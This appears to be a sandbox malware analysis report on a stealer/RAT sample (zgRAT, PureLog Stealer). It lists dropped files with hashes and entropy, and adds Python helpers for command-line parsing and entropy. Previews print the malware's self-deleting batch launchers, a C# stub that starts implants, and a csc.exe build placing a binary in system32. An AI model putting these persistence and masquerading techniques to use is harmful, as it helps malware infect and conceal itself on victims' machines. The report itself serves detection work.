                                                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..3,"System.Runtime.Serialization, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\Syste
                                                            Process:C:\ComproviderComponentIntocommon\ctfmon.exe
                                                            File Type:CSV text
                                                            Category:dropped
                                                            Size (bytes):847
                                                            Entropy (8bit):5.354334472896228
                                                            Encrypted:false
                                                            SSDEEP:24:ML9E4KQwKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQwYHKGSI6oPtHTHhAHKKkb
                                                            MD5:9F9FA9EFE67E9BBD165432FA39813EEA
                                                            SHA1:6FE9587FB8B6D9FE9FA9ADE987CB8112C294247A
                                                            SHA-256:4488EA75E0AC1E2DEB4B7FC35D304CAED2F877A7FB4CC6B8755AE13D709CF37B
                                                            SHA-512:F4666179D760D32871DDF54700D6B283AD8DA82FA6B867A214557CBAB757F74ACDFCAD824FB188005C0CEF3B05BF2352B9CA51B2C55AECF762468BB8F5560DB3
                                                            Malicious:false
                                                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..
                                                            Process:C:\Recovery\dwm.exe
                                                            File Type:CSV text
                                                            Category:dropped
                                                            Size (bytes):847
                                                            Entropy (8bit):5.354334472896228
                                                            Encrypted:false
                                                            SSDEEP:24:ML9E4KQwKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQwYHKGSI6oPtHTHhAHKKkb
                                                            MD5:9F9FA9EFE67E9BBD165432FA39813EEA
                                                            SHA1:6FE9587FB8B6D9FE9FA9ADE987CB8112C294247A
                                                            SHA-256:4488EA75E0AC1E2DEB4B7FC35D304CAED2F877A7FB4CC6B8755AE13D709CF37B
                                                            SHA-512:F4666179D760D32871DDF54700D6B283AD8DA82FA6B867A214557CBAB757F74ACDFCAD824FB188005C0CEF3B05BF2352B9CA51B2C55AECF762468BB8F5560DB3
                                                            Malicious:false
                                                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..
                                                            Process:C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exe
                                                            File Type:CSV text
                                                            Category:dropped
                                                            Size (bytes):847
                                                            Entropy (8bit):5.354334472896228
                                                            Encrypted:false
                                                            SSDEEP:24:ML9E4KQwKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQwYHKGSI6oPtHTHhAHKKkb
                                                            MD5:9F9FA9EFE67E9BBD165432FA39813EEA
                                                            SHA1:6FE9587FB8B6D9FE9FA9ADE987CB8112C294247A
                                                            SHA-256:4488EA75E0AC1E2DEB4B7FC35D304CAED2F877A7FB4CC6B8755AE13D709CF37B
                                                            SHA-512:F4666179D760D32871DDF54700D6B283AD8DA82FA6B867A214557CBAB757F74ACDFCAD824FB188005C0CEF3B05BF2352B9CA51B2C55AECF762468BB8F5560DB3
                                                            Malicious:false
                                                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..
                                                            Process:C:\Windows\Resources\Themes\smartscreen.exe
                                                            File Type:CSV text
                                                            Category:dropped
                                                            Size (bytes):1523
                                                            Entropy (8bit):5.373534083924954
                                                            Encrypted:false
                                                            SSDEEP:24:ML9E4KQwKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUN+E4KlOU4mC1qE4GIs0E4KD:MxHKQwYHKGSI6oPtHTHhAHKKk+HKlT41
                                                            MD5:5E675003E8A6113031BC81EC692CFE0A
                                                            SHA1:53FAFEED5B3E6489BDD729B50C948DD00A7CBC83
                                                            SHA-256:5A74192EB3D5A96FA18278AD0D7B9B4D791830D7F2ED7C70B3746B0A635DF24F
                                                            SHA-512:4F22E0ED4CF9ED3CA13DF90EC96DE2257128EFD5B67579DC822386D6233836F1EA3E11DAEB1DB36227CB5B2C595F8C296A2EB0706D356B6C86EA98A4FCC018D7
                                                            Malicious:false
                                                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..3,"System.Runtime.Serialization, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\Syste
                                                            Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                            File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x6f0, 10 symbols, created Sun Dec 29 00:07:15 2024, 1st section name ".debug$S"
                                                            Category:dropped
                                                            Size (bytes):1960
                                                            Entropy (8bit):4.552032381052421
                                                            Encrypted:false
                                                            SSDEEP:24:HxS9YHOO3NPDfHewKHF1qnN0luxOysuZhN7jSjRzPNnqpdt4+lEbNFjMyi0+GUZ:F/97dKHF1yyluOulajfqXSfbNtmhxZ
                                                            MD5:7FDCB2C08C4787FB292D1603BAAA0ABC
                                                            SHA1:ED65C666E45203DD1B975C8B9B20AF32C42F0EF7
                                                            SHA-256:A11EB967165519C0081B53A8C79BCAB341E0D4FD2F3F11B3D44EFA496B4B3303
                                                            SHA-512:9A43FCAC56C97FC14A6BB74A9CE3C8871E3BB44EDD1B5E8E054DFEFFE380C6D13D7ACF9F593393AC2E98AA3AC4EF5A3CE575FF5D8586A06DBF2A400C7A285111
                                                            Malicious:false
                                                            Preview:L.....pg.............debug$S........@...................@..B.rsrc$01................l...........@..@.rsrc$02........p...................@..@........;....c:\Windows\System32\CSC14843E573E24440A98F4B13FC0AF1E.TMP...................r.av..t.y..............4.......C:\Users\user\AppData\Local\Temp\RESF1F4.tmp.-.<....................a..Microsoft (R) CVTRES.i.=..cwd.C:\ComproviderComponentIntocommon.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe...................... .......8.......................P.......................h.......................................................|...............................................|.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...T.....I.n.t.e.r.n.a.l.N.a.m.e...S.e.c.u.r.i.t.y.
                                                            Process:C:\Windows\Resources\Themes\smartscreen.exe
                                                            File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):171
                                                            Entropy (8bit):5.073049080774059
                                                            Encrypted:false
                                                            SSDEEP:3:mKDDVNGvTVLuVFcROr+jn9mVtCex8+lA/VovBktKcKZG1t+kiE2J5xAImnoh:hCRLuVFOOr+DE/Cex8+aKvKOZG1wkn2J
                                                            MD5:C0D4761FA8CAE2D8A9099A464928903C
                                                            SHA1:F8DEA03FCF0AF97DAD80DF5C0B79DE3BB919F884
                                                            SHA-256:1B973239A4BBCE38550D6A7AC5EA8F09927F784D6BFB0BD1AD4DA03AB8A7B6C8
                                                            SHA-512:730E78395C4A5C7E8E91F441A9E22DFA9F4EDCD729541C1B0C8D42FFFC741934BD84496D89E7189D27A2357A50E95E36A59AF4DCE988CFE7E36E16699C918F49
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: Avira, Detection: 100%
                                                            Preview:@echo off..chcp 65001..ping -n 10 localhost > nul..start "" "C:\Windows\Resources\Themes\smartscreen.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\Ycxw1CWDXu.bat"
                                                            Process:C:\ComproviderComponentIntocommon\Portsessionsvc.exe
                                                            File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):165
                                                            Entropy (8bit):5.360201433931101
                                                            Encrypted:false
                                                            SSDEEP:3:mKDDVNGvTVLuVFcROr+jn9m7msB8/j88HyBktKcKZG1t+kiE2J5xAI72yMq:hCRLuVFOOr+DE7NuHyKOZG1wkn23f7P
                                                            MD5:5DF07F6F83D52B02CF72C51EBA14EE81
                                                            SHA1:F6AE134976E258CDA278FBF3FEB90C98D658837A
                                                            SHA-256:F8B26AC75BDF0D91E069F3568E72F5E408012191682D1376F2F341A3D048332F
                                                            SHA-512:41D7F8D8088E2F46FADAF3F067CB714562892E6A59074CFFE2273A728FBF950B02AF9345F13D1C1C95AC59E52D7E60D3A102AD03571F2AC0C2C21E95395CF8B6
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: Avira, Detection: 100%
                                                            Preview:@echo off..chcp 65001..ping -n 10 localhost > nul..start "" "C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\jdisWpWAyY.bat"
                                                            Process:C:\ComproviderComponentIntocommon\Portsessionsvc.exe
                                                            File Type:C++ source, Unicode text, UTF-8 (with BOM) text
                                                            Category:dropped
                                                            Size (bytes):390
                                                            Entropy (8bit):4.862703286231266
                                                            Encrypted:false
                                                            SSDEEP:12:V/DNVgtDIbSf+eBLZ7bfiFkMSf+eBLECexWuaiFkD:JNVQIbSfhV7TiFkMSfhUWu7FkD
                                                            MD5:5C593CF50AF5664C0C64273B23BE382C
                                                            SHA1:7162EEA1C445F1B811B7F27E24E4A1FF14FBE5B1
                                                            SHA-256:EE45DFF9A296F688ED5611F4548176616985C48FDF89ACAA419C61074F88B708
                                                            SHA-512:5403EDCC8C250B87D23BB99C414DF49725CFC8361663D25B2F9FE8FCA03C8B00EAA61F4DE7D7867E80DA969668296882F4E2779CE79804389D6B5A7D057D2769
                                                            Malicious:false
                                                            Preview:.using System.Diagnostics;.using System.Threading;..class Program.{. static void Main(string[] args). {. new Thread(() => { try { Process.Start(@"C:\Windows\system32\SecurityHealthSystray.exe.exe", string.Join(" ", args)); } catch { } }).Start();. new Thread(() => { try { Process.Start(@"C:\Windows\Resources\Themes\smartscreen.exe"); } catch { } }).Start();. }.}.
                                                            Process:C:\ComproviderComponentIntocommon\Portsessionsvc.exe
                                                            File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):250
                                                            Entropy (8bit):5.078704011140092
                                                            Encrypted:false
                                                            SSDEEP:6:Hu+H2L//1xRT0T79BzxsjGZxWE8owkn23ffV:Hu7L//TRq79cQWf3V
                                                            MD5:40BBF76E5F4405491C8CEF0145F1F659
                                                            SHA1:55E145BC951B42E39545A0F4475332978B90EED4
                                                            SHA-256:53D08540F097482A2DE1DB253918544979E65514B7EF94BE049B36F24267D1AB
                                                            SHA-512:B8A02E86102C0DFA91A5180571FCCD2DCE1E7F379BFAABF744CCB79D0D343FE2AB17BA9A0993C2FAF476E269B05C6F9F5FC9BD4ACECA9F45DF6B791C172455BF
                                                            Malicious:true
                                                            Preview:./t:exe /utf8output /R:"System.dll" /R:"System.Threading.dll" /R:"System.Data.dll" /out:"C:\Windows\system32\SecurityHealthSystray.exe" /debug- /optimize+ /optimize+ /target:winexe /unsafe "C:\Users\user\AppData\Local\Temp\jgewpxd5\jgewpxd5.0.cs"
                                                            Process:C:\ComproviderComponentIntocommon\Portsessionsvc.exe
                                                            File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (340), with CRLF, CR line terminators
                                                            Category:modified
                                                            Size (bytes):761
                                                            Entropy (8bit):5.248847921349353
                                                            Encrypted:false
                                                            SSDEEP:12:M9KjDI/u7L//TRq79cQWf3wKaxK4BFNn5KBZvK2wo8dRSgarZucvW3ZDPOU:OqDI/un/Vq79tWf3wKax5DqBVKVrdFAw
                                                            MD5:A89B744565B1917DC4F48B55CB15E141
                                                            SHA1:6B7B950CB55ED2989F5834EC5EC7E6B171CA4D64
                                                            SHA-256:5B93397AF877AB67A30C33B106E980942DADC18AEDACA26B84CE80B1B557C1D5
                                                            SHA-512:E59009EAF8C940E20B2C9488DF4D9643EAAA58EA61328CEC7CDA8D9B715A30816F8A5758156133C277817575DF0F9D64EC29592C4200C5827559D4A88D26C4B9
                                                            Malicious:false
                                                            Preview:.C:\ComproviderComponentIntocommon> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:exe /utf8output /R:"System.dll" /R:"System.Threading.dll" /R:"System.Data.dll" /out:"C:\Windows\system32\SecurityHealthSystray.exe" /debug- /optimize+ /optimize+ /target:winexe /unsafe "C:\Users\user\AppData\Local\Temp\jgewpxd5\jgewpxd5.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
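The three records above belong together: a C# stub is dropped to the user's temp directory, csc.exe is invoked through a response file, and the output lands at `C:\Windows\system32\SecurityHealthSystray.exe` while the stub itself launches `SecurityHealthSystray.exe.exe` in the same directory plus the implant under `C:\Windows\Resources\Themes`. The script below is an added example, not Joe Sandbox code or the sample's own; it reconstructs the command line and the source from the previews (with the `.` line breaks restored), tokenises the csc options, and reports the findings a reviewer would want: output under `C:\Windows`, source compiled from a temp directory, and a launch target with a doubled `.exe.exe` extension. It records every occurrence of a repeated option rather than assuming which of `/t:exe` and `/target:winexe` csc honours.

```python
"""What the csc.exe invocation recorded above actually builds.

Added example (not Joe Sandbox code). The command line and the C# source are
reconstructed from this report's previews with the '.' line breaks restored.
"""
import re

# Constructed: csc.exe command line as logged in the report.
CSC_CMDLINE = (
    r'"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:exe /utf8output '
    r'/R:"System.dll" /R:"System.Threading.dll" /R:"System.Data.dll" '
    r'/out:"C:\Windows\system32\SecurityHealthSystray.exe" /debug- /optimize+ /optimize+ '
    r'/target:winexe /unsafe "C:\Users\user\AppData\Local\Temp\jgewpxd5\jgewpxd5.0.cs"'
)

# Constructed: the dropped .cs file from the report.
STUB_SOURCE = r'''using System.Diagnostics;
using System.Threading;

class Program
{
    static void Main(string[] args)
    {
        new Thread(() => { try { Process.Start(@"C:\Windows\system32\SecurityHealthSystray.exe.exe", string.Join(" ", args)); } catch { } }).Start();
        new Thread(() => { try { Process.Start(@"C:\Windows\Resources\Themes\smartscreen.exe"); } catch { } }).Start();
    }
}'''

# A token is a run of non-space characters in which quoted spans may contain spaces.
TOKEN = re.compile(r'(?:[^\s"]+|"[^"]*")+')
ALIASES = {"r": "reference", "t": "target"}   # csc short forms of the long option names
PROCESS_START = re.compile(r'Process\.Start\(\s*@?"([^"]+)"')


def parse_csc_cmdline(cmdline: str) -> dict:
    tokens = [t.replace('"', "") for t in TOKEN.findall(cmdline)]
    options, sources = {}, []
    for tok in tokens[1:]:
        if tok.startswith("/"):
            name, sep, value = tok[1:].partition(":")
            name = ALIASES.get(name.lower(), name.lower())
            # keep every occurrence: the report shows /t:exe and /target:winexe side by side
            options.setdefault(name, []).append(value if sep else True)
        else:
            sources.append(tok)
    return {"compiler": tokens[0], "options": options, "sources": sources}


def assess_build(cmdline: str, source: str) -> dict:
    parsed = parse_csc_cmdline(cmdline)
    output = parsed["options"].get("out", [None])[-1]
    launches = PROCESS_START.findall(source)
    findings = []
    if output and output.lower().startswith("c:\\windows\\"):
        findings.append("compiler output written under C:\\Windows: " + output)
    for src in parsed["sources"]:
        if "\\appdata\\local\\temp\\" in src.lower():
            findings.append("source compiled from a user temp directory: " + src)
    for target in launches:
        if target.lower().endswith(".exe.exe"):
            findings.append("launch target with doubled extension: " + target)
    return {
        "compiler": parsed["compiler"],
        "output": output,
        "targets": parsed["options"].get("target", []),
        "references": parsed["options"].get("reference", []),
        "sources": parsed["sources"],
        "launches": launches,
        "findings": findings,
    }


if __name__ == "__main__":
    for line in assess_build(CSC_CMDLINE, STUB_SOURCE)["findings"]:
        print(line)
```

The same tokenizer and option map apply to csc.exe command lines pulled from process-creation telemetry; the `.cs` source is only needed for the launch-target step.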
                                                            Process:C:\Windows\Resources\Themes\smartscreen.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):25
                                                            Entropy (8bit):4.163856189774724
                                                            Encrypted:false
                                                            SSDEEP:3:G+TJdTesW:G0J5e3
                                                            MD5:75AAFDE9D36A62EB51B4273AC65B10CA
                                                            SHA1:00ADE28A22EF2DB35F46ED33DE3CFDCB924A43D1
                                                            SHA-256:7EE28802F67AB731F926B24678DD1ECC967CC30A17E6D2F54FEE9DCC57413D96
                                                            SHA-512:3A036FA26E087F29BB2BED50879B600EB22FEF0E8A744B43C21C4D2AB5654D1351B90237B56CB315D119F96DB2B5B0FCFF249852FB0EA2C802A0DE4848885971
                                                            Malicious:false
                                                            Preview:BpI6UJmLol8UySF4IyumYLpd3
                                                            Process:C:\ComproviderComponentIntocommon\Portsessionsvc.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):25
                                                            Entropy (8bit):4.403856189774723
                                                            Encrypted:false
                                                            SSDEEP:3:YfRc/+oIn:ycsn
                                                            MD5:C7F263A510C61ED5ACC03A977561B393
                                                            SHA1:1CB39968CF1F29F88A6A92771DA3CCB55195BF3D
                                                            SHA-256:8AC54DBF53000821FAB5296D3A2FD3FA9B01FEDDEA44A217BB90E0BBFE5E9DD9
                                                            SHA-512:726B34ADA3380B10C221D7F159D85EFED2FA49C6CFB6AB1F3F314F791EBBD9EACE33A7C5FCD1B21E2A879C13CCB8D4232B143EB0867D09BC3A9C2DECC49C255B
                                                            Malicious:false
                                                            Preview:WAML1QZgo9WRebDBJCRK0QUfq
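The two 25-byte files above have their full contents in the Preview field, which makes them a convenient check of how the report's `Entropy (8bit)` figure is computed. The block below is an added example, not Joe Sandbox code; it implements byte-histogram Shannon entropy, reproduces the report's 4.1638... and 4.4038... for those two files, and adds the ceiling a file of a given size can reach, since a 25-byte file cannot exceed log2(25) bits per byte and its absolute entropy is therefore not comparable with the 7.4 of the 1.6 MB executable further down.

```python
"""Shannon entropy as used in the report's 'Entropy (8bit)' field.

Added example (not Joe Sandbox code). The sample inputs are the two 25-byte
text files above, taken from their previews; the expected values are the
report's own figures.
"""
import math
from collections import Counter


def shannon_entropy(data: bytes) -> float:
    """Entropy in bits per byte over the byte histogram: 0.0 for a constant file, 8.0 for uniform."""
    n = len(data)
    if n == 0:
        return 0.0
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def entropy_ceiling(size: int) -> float:
    """A file of `size` bytes has at most min(size, 256) distinct byte values, so log2 of that is its ceiling."""
    return math.log2(min(size, 256)) if size > 1 else 0.0


def entropy_profile(data: bytes) -> dict:
    h = shannon_entropy(data)
    ceiling = entropy_ceiling(len(data))
    return {
        "size": len(data),
        "entropy": round(h, 9),
        "ceiling": round(ceiling, 9),
        # fraction of the achievable maximum: small random-looking files sit near 1.0
        # even though their absolute entropy is far below the 7+ seen for packed PE files
        "fill": round(h / ceiling, 3) if ceiling else 0.0,
    }


# Constructed: contents of the two 25-byte dropped files from this report, by dropping process.
SAMPLES = {
    "smartscreen.exe": b"BpI6UJmLol8UySF4IyumYLpd3",
    "Portsessionsvc.exe": b"WAML1QZgo9WRebDBJCRK0QUfq",
}


if __name__ == "__main__":
    for origin, content in SAMPLES.items():
        print(origin, entropy_profile(content))
```

For a whole PE file the same function over the full byte string gives the report's figure, but section-by-section entropy is the more useful triage signal, since a packed payload usually lives in one section while headers and resources stay low.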
                                                            Process:C:\Windows\Resources\Themes\smartscreen.exe
                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):32256
                                                            Entropy (8bit):5.631194486392901
                                                            Encrypted:false
                                                            SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                                            MD5:D8BF2A0481C0A17A634D066A711C12E9
                                                            SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                                            SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                                            SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: ReversingLabs, Detection: 25%
                                                            Joe Sandbox View:
• Filename: aimware.exe, Detection: malicious
• Filename: ZZ2sTsJFrt.exe, Detection: malicious
• Filename: r6cRyCpdfS.exe, Detection: malicious
• Filename: tBnELFfQoe.exe, Detection: malicious
• Filename: Z4D3XAZ2jB.exe, Detection: malicious
• Filename: 67VB5TS184.exe, Detection: malicious
• Filename: 4t8f8F3uT1.exe, Detection: malicious
• Filename: F3ePjP272h.exe, Detection: malicious
• Filename: cbCjTbodwa.exe, Detection: malicious
• Filename: vb8DOBZQ4X.exe, Detection: malicious
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                            Process:C:\ComproviderComponentIntocommon\Portsessionsvc.exe
                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):32256
                                                            Entropy (8bit):5.631194486392901
                                                            Encrypted:false
                                                            SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                                            MD5:D8BF2A0481C0A17A634D066A711C12E9
                                                            SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                                            SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                                            SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: ReversingLabs, Detection: 25%
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                            Process:C:\ComproviderComponentIntocommon\Portsessionsvc.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):66
                                                            Entropy (8bit):5.21076457377279
                                                            Encrypted:false
                                                            SSDEEP:3:xuAUUDrHG6VVEI7tMZNQn:SqG0pNn
                                                            MD5:9C54C837E380DBE92858CB4C80109A50
                                                            SHA1:8CE172B2BA2B3D43EC14EBA91BAFB43626F6327D
                                                            SHA-256:92C3D0008C840A89D2F22C767F9CCF2ED2B2E5624AE5B889409EB546A79F5337
                                                            SHA-512:80A024789990CEEFF71C4A0D3D3DF800E63FA2F202A2AB30E9E1D024B23B2D1F4228A35B6C2576BC73660A588691A4DD5A75F7B2EA8C2B4340A5835F78E7C369
                                                            Malicious:false
                                                            Preview:UaKf0Cm0hxjvOSeJLIJP1yobXntBUSvdFdANwIXV3pGSaKb1u4vHdtMfvtHNTlfPBG
                                                            Process:C:\ComproviderComponentIntocommon\Portsessionsvc.exe
                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):1688064
                                                            Entropy (8bit):7.441420393206227
                                                            Encrypted:false
                                                            SSDEEP:24576:bBz/sS1IVH3L88k4BeRFEOVqZ9U6adNhA3rjt4fxF3b5EJb7Tgo05ZfOs9:d4788WhV89R243rZ4fxR1EJuZJ
                                                            MD5:5231D0FCCC4F24F5B3D76964B3513636
                                                            SHA1:E6F29FA85FC7B9F590B8E775198D1958E07A0159
                                                            SHA-256:B42346EEE811EFBBCBC433708790E23CF157E6F5C802E7F3C309EA6BBF0FE6E3
                                                            SHA-512:0F20165583314C8B80FE2174BE752361226294098DB9744BB4C376C9B9F372495369EC5394DEFAB86AE6E2317524656EDE8C23E043A688DB78C9D0C7591BB99C
                                                            Malicious:true
                                                            Yara Hits:
                                                            • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Windows\Resources\Themes\smartscreen.exe, Author: Joe Security
                                                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Windows\Resources\Themes\smartscreen.exe, Author: Joe Security
                                                            Antivirus:
                                                            • Antivirus: Avira, Detection: 100%
                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                            • Antivirus: ReversingLabs, Detection: 78%
